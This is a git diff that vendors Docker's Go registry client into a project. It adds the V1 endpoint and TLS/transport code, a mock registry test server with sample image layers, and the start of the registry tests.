+ testServer := httptest.NewServer(requireBasicAuthHandler) + defer testServer.Close() + + testServerURL, err := url.Parse(testServer.URL) + if err != nil { + t.Fatal(err) + } + + testEndpoint := V1Endpoint{ + URL: testServerURL, + client: HTTPClient(NewTransport(nil)), + } + + if err = validateEndpoint(&testEndpoint); err != nil { + t.Fatal(err) + } + + if testEndpoint.URL.Scheme != "http" { + t.Fatalf("expecting to validate endpoint as http, got url %s", testEndpoint.String()) + } +} diff --git a/vendor/github.com/docker/docker/registry/endpoint_v1.go b/vendor/github.com/docker/docker/registry/endpoint_v1.go new file mode 100644 index 0000000000..6bcf8c935d --- /dev/null +++ b/vendor/github.com/docker/docker/registry/endpoint_v1.go @@ -0,0 +1,198 @@ +package registry + +import ( + "crypto/tls" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "net/url" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/registry/client/transport" + registrytypes "github.com/docker/docker/api/types/registry" +) + +// V1Endpoint stores basic information about a V1 registry endpoint. +type V1Endpoint struct { + client *http.Client + URL *url.URL + IsSecure bool +} + +// NewV1Endpoint parses the given address to return a registry endpoint. 
+func NewV1Endpoint(index *registrytypes.IndexInfo, userAgent string, metaHeaders http.Header) (*V1Endpoint, error) { + tlsConfig, err := newTLSConfig(index.Name, index.Secure) + if err != nil { + return nil, err + } + + endpoint, err := newV1EndpointFromStr(GetAuthConfigKey(index), tlsConfig, userAgent, metaHeaders) + if err != nil { + return nil, err + } + + if err := validateEndpoint(endpoint); err != nil { + return nil, err + } + + return endpoint, nil +} + +func validateEndpoint(endpoint *V1Endpoint) error { + logrus.Debugf("pinging registry endpoint %s", endpoint) + + // Try HTTPS ping to registry + endpoint.URL.Scheme = "https" + if _, err := endpoint.Ping(); err != nil { + if endpoint.IsSecure { + // If registry is secure and HTTPS failed, show user the error and tell them about `--insecure-registry` + // in case that's what they need. DO NOT accept unknown CA certificates, and DO NOT fallback to HTTP. + return fmt.Errorf("invalid registry endpoint %s: %v. If this private registry supports only HTTP or HTTPS with an unknown CA certificate, please add `--insecure-registry %s` to the daemon's arguments. In the case of HTTPS, if you have access to the registry's CA certificate, no need for the flag; simply place the CA certificate at /etc/docker/certs.d/%s/ca.crt", endpoint, err, endpoint.URL.Host, endpoint.URL.Host) + } + + // If registry is insecure and HTTPS failed, fallback to HTTP. + logrus.Debugf("Error from registry %q marked as insecure: %v. Insecurely falling back to HTTP", endpoint, err) + endpoint.URL.Scheme = "http" + + var err2 error + if _, err2 = endpoint.Ping(); err2 == nil { + return nil + } + + return fmt.Errorf("invalid registry endpoint %q. HTTPS attempt: %v. 
HTTP attempt: %v", endpoint, err, err2) + } + + return nil +} + +func newV1Endpoint(address url.URL, tlsConfig *tls.Config, userAgent string, metaHeaders http.Header) (*V1Endpoint, error) { + endpoint := &V1Endpoint{ + IsSecure: (tlsConfig == nil || !tlsConfig.InsecureSkipVerify), + URL: new(url.URL), + } + + *endpoint.URL = address + + // TODO(tiborvass): make sure a ConnectTimeout transport is used + tr := NewTransport(tlsConfig) + endpoint.client = HTTPClient(transport.NewTransport(tr, DockerHeaders(userAgent, metaHeaders)...)) + return endpoint, nil +} + +// trimV1Address trims the version off the address and returns the +// trimmed address or an error if there is a non-V1 version. +func trimV1Address(address string) (string, error) { + var ( + chunks []string + apiVersionStr string + ) + + if strings.HasSuffix(address, "/") { + address = address[:len(address)-1] + } + + chunks = strings.Split(address, "/") + apiVersionStr = chunks[len(chunks)-1] + if apiVersionStr == "v1" { + return strings.Join(chunks[:len(chunks)-1], "/"), nil + } + + for k, v := range apiVersions { + if k != APIVersion1 && apiVersionStr == v { + return "", fmt.Errorf("unsupported V1 version path %s", apiVersionStr) + } + } + + return address, nil +} + +func newV1EndpointFromStr(address string, tlsConfig *tls.Config, userAgent string, metaHeaders http.Header) (*V1Endpoint, error) { + if !strings.HasPrefix(address, "http://") && !strings.HasPrefix(address, "https://") { + address = "https://" + address + } + + address, err := trimV1Address(address) + if err != nil { + return nil, err + } + + uri, err := url.Parse(address) + if err != nil { + return nil, err + } + + endpoint, err := newV1Endpoint(*uri, tlsConfig, userAgent, metaHeaders) + if err != nil { + return nil, err + } + + return endpoint, nil +} + +// Get the formatted URL for the root of this registry Endpoint +func (e *V1Endpoint) String() string { + return e.URL.String() + "/v1/" +} + +// Path returns a formatted string for the URL 
+// of this endpoint with the given path appended. +func (e *V1Endpoint) Path(path string) string { + return e.URL.String() + "/v1/" + path +} + +// Ping returns a PingResult which indicates whether the registry is standalone or not. +func (e *V1Endpoint) Ping() (PingResult, error) { + logrus.Debugf("attempting v1 ping for registry endpoint %s", e) + + if e.String() == IndexServer { + // Skip the check, we know this one is valid + // (and we never want to fallback to http in case of error) + return PingResult{Standalone: false}, nil + } + + req, err := http.NewRequest("GET", e.Path("_ping"), nil) + if err != nil { + return PingResult{Standalone: false}, err + } + + resp, err := e.client.Do(req) + if err != nil { + return PingResult{Standalone: false}, err + } + + defer resp.Body.Close() + + jsonString, err := ioutil.ReadAll(resp.Body) + if err != nil { + return PingResult{Standalone: false}, fmt.Errorf("error while reading the http response: %s", err) + } + + // If the header is absent, we assume true for compatibility with earlier + // versions of the registry. default to true + info := PingResult{ + Standalone: true, + } + if err := json.Unmarshal(jsonString, &info); err != nil { + logrus.Debugf("Error unmarshalling the _ping PingResult: %s", err) + // don't stop here. Just assume sane defaults + } + if hdr := resp.Header.Get("X-Docker-Registry-Version"); hdr != "" { + logrus.Debugf("Registry version header: '%s'", hdr) + info.Version = hdr + } + logrus.Debugf("PingResult.Version: %q", info.Version) + + standalone := resp.Header.Get("X-Docker-Registry-Standalone") + logrus.Debugf("Registry standalone header: '%s'", standalone) + // Accepted values are "true" (case-insensitive) and "1". 
+ if strings.EqualFold(standalone, "true") || standalone == "1" { + info.Standalone = true + } else if len(standalone) > 0 { + // there is a header set, and it is not "true" or "1", so assume fails + info.Standalone = false + } + logrus.Debugf("PingResult.Standalone: %t", info.Standalone) + return info, nil +} diff --git a/vendor/github.com/docker/docker/registry/registry.go b/vendor/github.com/docker/docker/registry/registry.go new file mode 100644 index 0000000000..17fa97ce3d --- /dev/null +++ b/vendor/github.com/docker/docker/registry/registry.go @@ -0,0 +1,191 @@ +// Package registry contains client primitives to interact with a remote Docker registry. +package registry + +import ( + "crypto/tls" + "errors" + "fmt" + "io/ioutil" + "net" + "net/http" + "os" + "path/filepath" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/registry/client/transport" + "github.com/docker/go-connections/sockets" + "github.com/docker/go-connections/tlsconfig" +) + +var ( + // ErrAlreadyExists is an error returned if an image being pushed + // already exists on the remote side + ErrAlreadyExists = errors.New("Image already exists") +) + +func newTLSConfig(hostname string, isSecure bool) (*tls.Config, error) { + // PreferredServerCipherSuites should have no effect + tlsConfig := tlsconfig.ServerDefault() + + tlsConfig.InsecureSkipVerify = !isSecure + + if isSecure && CertsDir != "" { + hostDir := filepath.Join(CertsDir, cleanPath(hostname)) + logrus.Debugf("hostDir: %s", hostDir) + if err := ReadCertsDirectory(tlsConfig, hostDir); err != nil { + return nil, err + } + } + + return tlsConfig, nil +} + +func hasFile(files []os.FileInfo, name string) bool { + for _, f := range files { + if f.Name() == name { + return true + } + } + return false +} + +// ReadCertsDirectory reads the directory for TLS certificates +// including roots and certificate pairs and updates the +// provided TLS configuration. 
+func ReadCertsDirectory(tlsConfig *tls.Config, directory string) error { + fs, err := ioutil.ReadDir(directory) + if err != nil && !os.IsNotExist(err) { + return err + } + + for _, f := range fs { + if strings.HasSuffix(f.Name(), ".crt") { + if tlsConfig.RootCAs == nil { + systemPool, err := tlsconfig.SystemCertPool() + if err != nil { + return fmt.Errorf("unable to get system cert pool: %v", err) + } + tlsConfig.RootCAs = systemPool + } + logrus.Debugf("crt: %s", filepath.Join(directory, f.Name())) + data, err := ioutil.ReadFile(filepath.Join(directory, f.Name())) + if err != nil { + return err + } + tlsConfig.RootCAs.AppendCertsFromPEM(data) + } + if strings.HasSuffix(f.Name(), ".cert") { + certName := f.Name() + keyName := certName[:len(certName)-5] + ".key" + logrus.Debugf("cert: %s", filepath.Join(directory, f.Name())) + if !hasFile(fs, keyName) { + return fmt.Errorf("Missing key %s for client certificate %s. Note that CA certificates should use the extension .crt.", keyName, certName) + } + cert, err := tls.LoadX509KeyPair(filepath.Join(directory, certName), filepath.Join(directory, keyName)) + if err != nil { + return err + } + tlsConfig.Certificates = append(tlsConfig.Certificates, cert) + } + if strings.HasSuffix(f.Name(), ".key") { + keyName := f.Name() + certName := keyName[:len(keyName)-4] + ".cert" + logrus.Debugf("key: %s", filepath.Join(directory, f.Name())) + if !hasFile(fs, certName) { + return fmt.Errorf("Missing client certificate %s for key %s", certName, keyName) + } + } + } + + return nil +} + +// DockerHeaders returns request modifiers with a User-Agent and metaHeaders +func DockerHeaders(userAgent string, metaHeaders http.Header) []transport.RequestModifier { + modifiers := []transport.RequestModifier{} + if userAgent != "" { + modifiers = append(modifiers, transport.NewHeaderRequestModifier(http.Header{ + "User-Agent": []string{userAgent}, + })) + } + if metaHeaders != nil { + modifiers = append(modifiers, 
transport.NewHeaderRequestModifier(metaHeaders)) + } + return modifiers +} + +// HTTPClient returns an HTTP client structure which uses the given transport +// and contains the necessary headers for redirected requests +func HTTPClient(transport http.RoundTripper) *http.Client { + return &http.Client{ + Transport: transport, + CheckRedirect: addRequiredHeadersToRedirectedRequests, + } +} + +func trustedLocation(req *http.Request) bool { + var ( + trusteds = []string{"docker.com", "docker.io"} + hostname = strings.SplitN(req.Host, ":", 2)[0] + ) + if req.URL.Scheme != "https" { + return false + } + + for _, trusted := range trusteds { + if hostname == trusted || strings.HasSuffix(hostname, "."+trusted) { + return true + } + } + return false +} + +// addRequiredHeadersToRedirectedRequests adds the necessary redirection headers +// for redirected requests +func addRequiredHeadersToRedirectedRequests(req *http.Request, via []*http.Request) error { + if via != nil && via[0] != nil { + if trustedLocation(req) && trustedLocation(via[0]) { + req.Header = via[0].Header + return nil + } + for k, v := range via[0].Header { + if k != "Authorization" { + for _, vv := range v { + req.Header.Add(k, vv) + } + } + } + } + return nil +} + +// NewTransport returns a new HTTP transport. If tlsConfig is nil, it uses the +// default TLS configuration. 
+func NewTransport(tlsConfig *tls.Config) *http.Transport { + if tlsConfig == nil { + tlsConfig = tlsconfig.ServerDefault() + } + + direct := &net.Dialer{ + Timeout: 30 * time.Second, + KeepAlive: 30 * time.Second, + DualStack: true, + } + + base := &http.Transport{ + Proxy: http.ProxyFromEnvironment, + Dial: direct.Dial, + TLSHandshakeTimeout: 10 * time.Second, + TLSClientConfig: tlsConfig, + // TODO(dmcgowan): Call close idle connections when complete and use keep alive + DisableKeepAlives: true, + } + + proxyDialer, err := sockets.DialerFromEnvironment(direct) + if err == nil { + base.Dial = proxyDialer.Dial + } + return base +} diff --git a/vendor/github.com/docker/docker/registry/registry_mock_test.go b/vendor/github.com/docker/docker/registry/registry_mock_test.go new file mode 100644 index 0000000000..21fc1fdcc7 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/registry_mock_test.go @@ -0,0 +1,478 @@ +// +build !solaris + +package registry + +import ( + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "net" + "net/http" + "net/http/httptest" + "net/url" + "strconv" + "strings" + "testing" + "time" + + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/reference" + "github.com/gorilla/mux" + + "github.com/Sirupsen/logrus" +) + +var ( + testHTTPServer *httptest.Server + testHTTPSServer *httptest.Server + testLayers = map[string]map[string]string{ + "77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20": { + "json": `{"id":"77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20", + "comment":"test base image","created":"2013-03-23T12:53:11.10432-07:00", + "container_config":{"Hostname":"","User":"","Memory":0,"MemorySwap":0, + "CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false, + "Tty":false,"OpenStdin":false,"StdinOnce":false, + "Env":null,"Cmd":null,"Dns":null,"Image":"","Volumes":null, + "VolumesFrom":"","Entrypoint":null},"Size":424242}`, + 
"checksum_simple": "sha256:1ac330d56e05eef6d438586545ceff7550d3bdcb6b19961f12c5ba714ee1bb37", + "checksum_tarsum": "tarsum+sha256:4409a0685741ca86d38df878ed6f8cbba4c99de5dc73cd71aef04be3bb70be7c", + "ancestry": `["77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20"]`, + "layer": string([]byte{ + 0x1f, 0x8b, 0x08, 0x08, 0x0e, 0xb0, 0xee, 0x51, 0x02, 0x03, 0x6c, 0x61, 0x79, 0x65, + 0x72, 0x2e, 0x74, 0x61, 0x72, 0x00, 0xed, 0xd2, 0x31, 0x0e, 0xc2, 0x30, 0x0c, 0x05, + 0x50, 0xcf, 0x9c, 0xc2, 0x27, 0x48, 0xed, 0x38, 0x4e, 0xce, 0x13, 0x44, 0x2b, 0x66, + 0x62, 0x24, 0x8e, 0x4f, 0xa0, 0x15, 0x63, 0xb6, 0x20, 0x21, 0xfc, 0x96, 0xbf, 0x78, + 0xb0, 0xf5, 0x1d, 0x16, 0x98, 0x8e, 0x88, 0x8a, 0x2a, 0xbe, 0x33, 0xef, 0x49, 0x31, + 0xed, 0x79, 0x40, 0x8e, 0x5c, 0x44, 0x85, 0x88, 0x33, 0x12, 0x73, 0x2c, 0x02, 0xa8, + 0xf0, 0x05, 0xf7, 0x66, 0xf5, 0xd6, 0x57, 0x69, 0xd7, 0x7a, 0x19, 0xcd, 0xf5, 0xb1, + 0x6d, 0x1b, 0x1f, 0xf9, 0xba, 0xe3, 0x93, 0x3f, 0x22, 0x2c, 0xb6, 0x36, 0x0b, 0xf6, + 0xb0, 0xa9, 0xfd, 0xe7, 0x94, 0x46, 0xfd, 0xeb, 0xd1, 0x7f, 0x2c, 0xc4, 0xd2, 0xfb, + 0x97, 0xfe, 0x02, 0x80, 0xe4, 0xfd, 0x4f, 0x77, 0xae, 0x6d, 0x3d, 0x81, 0x73, 0xce, + 0xb9, 0x7f, 0xf3, 0x04, 0x41, 0xc1, 0xab, 0xc6, 0x00, 0x0a, 0x00, 0x00, + }), + }, + "42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d": { + "json": `{"id":"42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d", + "parent":"77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20", + "comment":"test base image","created":"2013-03-23T12:55:11.10432-07:00", + "container_config":{"Hostname":"","User":"","Memory":0,"MemorySwap":0, + "CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false, + "Tty":false,"OpenStdin":false,"StdinOnce":false, + "Env":null,"Cmd":null,"Dns":null,"Image":"","Volumes":null, + "VolumesFrom":"","Entrypoint":null},"Size":424242}`, + "checksum_simple": "sha256:bea7bf2e4bacd479344b737328db47b18880d09096e6674165533aa994f5e9f2", + 
"checksum_tarsum": "tarsum+sha256:68fdb56fb364f074eec2c9b3f85ca175329c4dcabc4a6a452b7272aa613a07a2", + "ancestry": `["42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d", + "77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20"]`, + "layer": string([]byte{ + 0x1f, 0x8b, 0x08, 0x08, 0xbd, 0xb3, 0xee, 0x51, 0x02, 0x03, 0x6c, 0x61, 0x79, 0x65, + 0x72, 0x2e, 0x74, 0x61, 0x72, 0x00, 0xed, 0xd1, 0x31, 0x0e, 0xc2, 0x30, 0x0c, 0x05, + 0x50, 0xcf, 0x9c, 0xc2, 0x27, 0x48, 0x9d, 0x38, 0x8e, 0xcf, 0x53, 0x51, 0xaa, 0x56, + 0xea, 0x44, 0x82, 0xc4, 0xf1, 0x09, 0xb4, 0xea, 0x98, 0x2d, 0x48, 0x08, 0xbf, 0xe5, + 0x2f, 0x1e, 0xfc, 0xf5, 0xdd, 0x00, 0xdd, 0x11, 0x91, 0x8a, 0xe0, 0x27, 0xd3, 0x9e, + 0x14, 0xe2, 0x9e, 0x07, 0xf4, 0xc1, 0x2b, 0x0b, 0xfb, 0xa4, 0x82, 0xe4, 0x3d, 0x93, + 0x02, 0x0a, 0x7c, 0xc1, 0x23, 0x97, 0xf1, 0x5e, 0x5f, 0xc9, 0xcb, 0x38, 0xb5, 0xee, + 0xea, 0xd9, 0x3c, 0xb7, 0x4b, 0xbe, 0x7b, 0x9c, 0xf9, 0x23, 0xdc, 0x50, 0x6e, 0xb9, + 0xb8, 0xf2, 0x2c, 0x5d, 0xf7, 0x4f, 0x31, 0xb6, 0xf6, 0x4f, 0xc7, 0xfe, 0x41, 0x55, + 0x63, 0xdd, 0x9f, 0x89, 0x09, 0x90, 0x6c, 0xff, 0xee, 0xae, 0xcb, 0xba, 0x4d, 0x17, + 0x30, 0xc6, 0x18, 0xf3, 0x67, 0x5e, 0xc1, 0xed, 0x21, 0x5d, 0x00, 0x0a, 0x00, 0x00, + }), + }, + } + testRepositories = map[string]map[string]string{ + "foo42/bar": { + "latest": "42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d", + "test": "42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d", + }, + } + mockHosts = map[string][]net.IP{ + "": {net.ParseIP("0.0.0.0")}, + "localhost": {net.ParseIP("127.0.0.1"), net.ParseIP("::1")}, + "example.com": {net.ParseIP("42.42.42.42")}, + "other.com": {net.ParseIP("43.43.43.43")}, + } +) + +func init() { + r := mux.NewRouter() + + // /v1/ + r.HandleFunc("/v1/_ping", handlerGetPing).Methods("GET") + r.HandleFunc("/v1/images/{image_id:[^/]+}/{action:json|layer|ancestry}", handlerGetImage).Methods("GET") + 
r.HandleFunc("/v1/images/{image_id:[^/]+}/{action:json|layer|checksum}", handlerPutImage).Methods("PUT") + r.HandleFunc("/v1/repositories/{repository:.+}/tags", handlerGetDeleteTags).Methods("GET", "DELETE") + r.HandleFunc("/v1/repositories/{repository:.+}/tags/{tag:.+}", handlerGetTag).Methods("GET") + r.HandleFunc("/v1/repositories/{repository:.+}/tags/{tag:.+}", handlerPutTag).Methods("PUT") + r.HandleFunc("/v1/users{null:.*}", handlerUsers).Methods("GET", "POST", "PUT") + r.HandleFunc("/v1/repositories/{repository:.+}{action:/images|/}", handlerImages).Methods("GET", "PUT", "DELETE") + r.HandleFunc("/v1/repositories/{repository:.+}/auth", handlerAuth).Methods("PUT") + r.HandleFunc("/v1/search", handlerSearch).Methods("GET") + + // /v2/ + r.HandleFunc("/v2/version", handlerGetPing).Methods("GET") + + testHTTPServer = httptest.NewServer(handlerAccessLog(r)) + testHTTPSServer = httptest.NewTLSServer(handlerAccessLog(r)) + + // override net.LookupIP + lookupIP = func(host string) ([]net.IP, error) { + if host == "127.0.0.1" { + // I believe in future Go versions this will fail, so let's fix it later + return net.LookupIP(host) + } + for h, addrs := range mockHosts { + if host == h { + return addrs, nil + } + for _, addr := range addrs { + if addr.String() == host { + return []net.IP{addr}, nil + } + } + } + return nil, errors.New("lookup: no such host") + } +} + +func handlerAccessLog(handler http.Handler) http.Handler { + logHandler := func(w http.ResponseWriter, r *http.Request) { + logrus.Debugf("%s \"%s %s\"", r.RemoteAddr, r.Method, r.URL) + handler.ServeHTTP(w, r) + } + return http.HandlerFunc(logHandler) +} + +func makeURL(req string) string { + return testHTTPServer.URL + req +} + +func makeHTTPSURL(req string) string { + return testHTTPSServer.URL + req +} + +func makeIndex(req string) *registrytypes.IndexInfo { + index := ®istrytypes.IndexInfo{ + Name: makeURL(req), + } + return index +} + +func makeHTTPSIndex(req string) *registrytypes.IndexInfo { + 
index := ®istrytypes.IndexInfo{ + Name: makeHTTPSURL(req), + } + return index +} + +func makePublicIndex() *registrytypes.IndexInfo { + index := ®istrytypes.IndexInfo{ + Name: IndexServer, + Secure: true, + Official: true, + } + return index +} + +func makeServiceConfig(mirrors []string, insecureRegistries []string) *serviceConfig { + options := ServiceOptions{ + Mirrors: mirrors, + InsecureRegistries: insecureRegistries, + } + + return newServiceConfig(options) +} + +func writeHeaders(w http.ResponseWriter) { + h := w.Header() + h.Add("Server", "docker-tests/mock") + h.Add("Expires", "-1") + h.Add("Content-Type", "application/json") + h.Add("Pragma", "no-cache") + h.Add("Cache-Control", "no-cache") + h.Add("X-Docker-Registry-Version", "0.0.0") + h.Add("X-Docker-Registry-Config", "mock") +} + +func writeResponse(w http.ResponseWriter, message interface{}, code int) { + writeHeaders(w) + w.WriteHeader(code) + body, err := json.Marshal(message) + if err != nil { + io.WriteString(w, err.Error()) + return + } + w.Write(body) +} + +func readJSON(r *http.Request, dest interface{}) error { + body, err := ioutil.ReadAll(r.Body) + if err != nil { + return err + } + return json.Unmarshal(body, dest) +} + +func apiError(w http.ResponseWriter, message string, code int) { + body := map[string]string{ + "error": message, + } + writeResponse(w, body, code) +} + +func assertEqual(t *testing.T, a interface{}, b interface{}, message string) { + if a == b { + return + } + if len(message) == 0 { + message = fmt.Sprintf("%v != %v", a, b) + } + t.Fatal(message) +} + +func assertNotEqual(t *testing.T, a interface{}, b interface{}, message string) { + if a != b { + return + } + if len(message) == 0 { + message = fmt.Sprintf("%v == %v", a, b) + } + t.Fatal(message) +} + +// Similar to assertEqual, but does not stop test +func checkEqual(t *testing.T, a interface{}, b interface{}, messagePrefix string) { + if a == b { + return + } + message := fmt.Sprintf("%v != %v", a, b) + if 
len(messagePrefix) != 0 { + message = messagePrefix + ": " + message + } + t.Error(message) +} + +// Similar to assertNotEqual, but does not stop test +func checkNotEqual(t *testing.T, a interface{}, b interface{}, messagePrefix string) { + if a != b { + return + } + message := fmt.Sprintf("%v == %v", a, b) + if len(messagePrefix) != 0 { + message = messagePrefix + ": " + message + } + t.Error(message) +} + +func requiresAuth(w http.ResponseWriter, r *http.Request) bool { + writeCookie := func() { + value := fmt.Sprintf("FAKE-SESSION-%d", time.Now().UnixNano()) + cookie := &http.Cookie{Name: "session", Value: value, MaxAge: 3600} + http.SetCookie(w, cookie) + //FIXME(sam): this should be sent only on Index routes + value = fmt.Sprintf("FAKE-TOKEN-%d", time.Now().UnixNano()) + w.Header().Add("X-Docker-Token", value) + } + if len(r.Cookies()) > 0 { + writeCookie() + return true + } + if len(r.Header.Get("Authorization")) > 0 { + writeCookie() + return true + } + w.Header().Add("WWW-Authenticate", "token") + apiError(w, "Wrong auth", 401) + return false +} + +func handlerGetPing(w http.ResponseWriter, r *http.Request) { + writeResponse(w, true, 200) +} + +func handlerGetImage(w http.ResponseWriter, r *http.Request) { + if !requiresAuth(w, r) { + return + } + vars := mux.Vars(r) + layer, exists := testLayers[vars["image_id"]] + if !exists { + http.NotFound(w, r) + return + } + writeHeaders(w) + layerSize := len(layer["layer"]) + w.Header().Add("X-Docker-Size", strconv.Itoa(layerSize)) + io.WriteString(w, layer[vars["action"]]) +} + +func handlerPutImage(w http.ResponseWriter, r *http.Request) { + if !requiresAuth(w, r) { + return + } + vars := mux.Vars(r) + imageID := vars["image_id"] + action := vars["action"] + layer, exists := testLayers[imageID] + if !exists { + if action != "json" { + http.NotFound(w, r) + return + } + layer = make(map[string]string) + testLayers[imageID] = layer + } + if checksum := r.Header.Get("X-Docker-Checksum"); checksum != "" { + if 
checksum != layer["checksum_simple"] && checksum != layer["checksum_tarsum"] {
+			apiError(w, "Wrong checksum", 400)
+			return
+		}
+	}
+	body, err := ioutil.ReadAll(r.Body)
+	if err != nil {
+		apiError(w, fmt.Sprintf("Error: %s", err), 500)
+		return
+	}
+	layer[action] = string(body)
+	writeResponse(w, true, 200)
+}
+
+func handlerGetDeleteTags(w http.ResponseWriter, r *http.Request) {
+	if !requiresAuth(w, r) {
+		return
+	}
+	repositoryName, err := reference.WithName(mux.Vars(r)["repository"])
+	if err != nil {
+		apiError(w, "Could not parse repository", 400)
+		return
+	}
+	tags, exists := testRepositories[repositoryName.String()]
+	if !exists {
+		apiError(w, "Repository not found", 404)
+		return
+	}
+	if r.Method == "DELETE" {
+		delete(testRepositories, repositoryName.String())
+		writeResponse(w, true, 200)
+		return
+	}
+	writeResponse(w, tags, 200)
+}
+
+func handlerGetTag(w http.ResponseWriter, r *http.Request) {
+	if !requiresAuth(w, r) {
+		return
+	}
+	vars := mux.Vars(r)
+	repositoryName, err := reference.WithName(vars["repository"])
+	if err != nil {
+		apiError(w, "Could not parse repository", 400)
+		return
+	}
+	tagName := vars["tag"]
+	tags, exists := testRepositories[repositoryName.String()]
+	if !exists {
+		apiError(w, "Repository not found", 404)
+		return
+	}
+	tag, exists := tags[tagName]
+	if !exists {
+		apiError(w, "Tag not found", 404)
+		return
+	}
+	writeResponse(w, tag, 200)
+}
+
+func handlerPutTag(w http.ResponseWriter, r *http.Request) {
+	if !requiresAuth(w, r) {
+		return
+	}
+	vars := mux.Vars(r)
+	repositoryName, err := reference.WithName(vars["repository"])
+	if err != nil {
+		apiError(w, "Could not parse repository", 400)
+		return
+	}
+	tagName := vars["tag"]
+	tags, exists := testRepositories[repositoryName.String()]
+	if !exists {
+		tags = make(map[string]string)
+		testRepositories[repositoryName.String()] = tags
+	}
+	tagValue := ""
+	readJSON(r, &tagValue)
+	tags[tagName] = tagValue
+	writeResponse(w, true, 200)
+}
+
+func handlerUsers(w 
http.ResponseWriter, r *http.Request) { + code := 200 + if r.Method == "POST" { + code = 201 + } else if r.Method == "PUT" { + code = 204 + } + writeResponse(w, "", code) +} + +func handlerImages(w http.ResponseWriter, r *http.Request) { + u, _ := url.Parse(testHTTPServer.URL) + w.Header().Add("X-Docker-Endpoints", fmt.Sprintf("%s , %s ", u.Host, "test.example.com")) + w.Header().Add("X-Docker-Token", fmt.Sprintf("FAKE-SESSION-%d", time.Now().UnixNano())) + if r.Method == "PUT" { + if strings.HasSuffix(r.URL.Path, "images") { + writeResponse(w, "", 204) + return + } + writeResponse(w, "", 200) + return + } + if r.Method == "DELETE" { + writeResponse(w, "", 204) + return + } + images := []map[string]string{} + for imageID, layer := range testLayers { + image := make(map[string]string) + image["id"] = imageID + image["checksum"] = layer["checksum_tarsum"] + image["Tag"] = "latest" + images = append(images, image) + } + writeResponse(w, images, 200) +} + +func handlerAuth(w http.ResponseWriter, r *http.Request) { + writeResponse(w, "OK", 200) +} + +func handlerSearch(w http.ResponseWriter, r *http.Request) { + result := ®istrytypes.SearchResults{ + Query: "fakequery", + NumResults: 1, + Results: []registrytypes.SearchResult{{Name: "fakeimage", StarCount: 42}}, + } + writeResponse(w, result, 200) +} + +func TestPing(t *testing.T) { + res, err := http.Get(makeURL("/v1/_ping")) + if err != nil { + t.Fatal(err) + } + assertEqual(t, res.StatusCode, 200, "") + assertEqual(t, res.Header.Get("X-Docker-Registry-Config"), "mock", + "This is not a Mocked Registry") +} + +/* Uncomment this to test Mocked Registry locally with curl + * WARNING: Don't push on the repos uncommented, it'll block the tests + * +func TestWait(t *testing.T) { + logrus.Println("Test HTTP server ready and waiting:", testHTTPServer.URL) + c := make(chan int) + <-c +} + +//*/ diff --git a/vendor/github.com/docker/docker/registry/registry_test.go b/vendor/github.com/docker/docker/registry/registry_test.go 
new file mode 100644 index 0000000000..786dfbed40 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/registry_test.go @@ -0,0 +1,875 @@ +// +build !solaris + +package registry + +import ( + "fmt" + "net/http" + "net/http/httputil" + "net/url" + "strings" + "testing" + + "github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/reference" +) + +var ( + token = []string{"fake-token"} +) + +const ( + imageID = "42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d" + REPO = "foo42/bar" +) + +func spawnTestRegistrySession(t *testing.T) *Session { + authConfig := &types.AuthConfig{} + endpoint, err := NewV1Endpoint(makeIndex("/v1/"), "", nil) + if err != nil { + t.Fatal(err) + } + userAgent := "docker test client" + var tr http.RoundTripper = debugTransport{NewTransport(nil), t.Log} + tr = transport.NewTransport(AuthTransport(tr, authConfig, false), DockerHeaders(userAgent, nil)...) + client := HTTPClient(tr) + r, err := NewSession(client, authConfig, endpoint) + if err != nil { + t.Fatal(err) + } + // In a normal scenario for the v1 registry, the client should send a `X-Docker-Token: true` + // header while authenticating, in order to retrieve a token that can be later used to + // perform authenticated actions. + // + // The mock v1 registry does not support that, (TODO(tiborvass): support it), instead, + // it will consider authenticated any request with the header `X-Docker-Token: fake-token`. + // + // Because we know that the client's transport is an `*authTransport` we simply cast it, + // in order to set the internal cached token to the fake token, and thus send that fake token + // upon every subsequent requests. 
+ r.client.Transport.(*authTransport).token = token + return r +} + +func TestPingRegistryEndpoint(t *testing.T) { + testPing := func(index *registrytypes.IndexInfo, expectedStandalone bool, assertMessage string) { + ep, err := NewV1Endpoint(index, "", nil) + if err != nil { + t.Fatal(err) + } + regInfo, err := ep.Ping() + if err != nil { + t.Fatal(err) + } + + assertEqual(t, regInfo.Standalone, expectedStandalone, assertMessage) + } + + testPing(makeIndex("/v1/"), true, "Expected standalone to be true (default)") + testPing(makeHTTPSIndex("/v1/"), true, "Expected standalone to be true (default)") + testPing(makePublicIndex(), false, "Expected standalone to be false for public index") +} + +func TestEndpoint(t *testing.T) { + // Simple wrapper to fail test if err != nil + expandEndpoint := func(index *registrytypes.IndexInfo) *V1Endpoint { + endpoint, err := NewV1Endpoint(index, "", nil) + if err != nil { + t.Fatal(err) + } + return endpoint + } + + assertInsecureIndex := func(index *registrytypes.IndexInfo) { + index.Secure = true + _, err := NewV1Endpoint(index, "", nil) + assertNotEqual(t, err, nil, index.Name+": 